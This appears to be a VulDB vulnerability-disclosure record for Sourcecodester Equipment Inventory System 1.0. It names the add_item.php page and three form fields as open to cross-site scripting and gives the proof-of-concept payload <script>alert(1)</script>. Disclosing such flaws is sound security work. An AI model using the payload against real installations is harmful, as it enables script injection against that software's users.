| Title | Equipment Inventory System-Cross Site Scripting(XSS) |
|---|
| Description | Equipment Inventory System-XSS
Date: 2022-08/22
Exploit Author: [email protected]
Vendor Homepage:
https://www.sourcecodester.com
Software Link:
https://www.sourcecodester.com/php/11327/equipment-inventory.html
Version: 1.0
/data/add_item.php
Generic Name、Item Code:、Brand NameParameters have Cross Site Scripting(XSS)
payload:
<script>alert(1)</script>
about:
https://github.com/anx0ing/CVE_demo/blob/main/2022/Equipment%20Inventory%20System-XSS.md
|
|---|
| Source | ⚠️ https://github.com/anx0ing/CVE_demo/blob/main/2022/Equipment%20Inventory%20System-XSS.md |
|---|
| User | anx0ing (UID 30698) |
|---|
| Submission | 08/22/2022 10:53 (4 years ago) |
|---|
| Moderation | 08/23/2022 10:40 (24 hours later) |
|---|
| Status | Duplicate |
|---|
| VulDB entry | 174227 [Sourcecodester Equipment Inventory System 1.0 Add Section Name cross site scripting] |
|---|
| Points | 0 |
|---|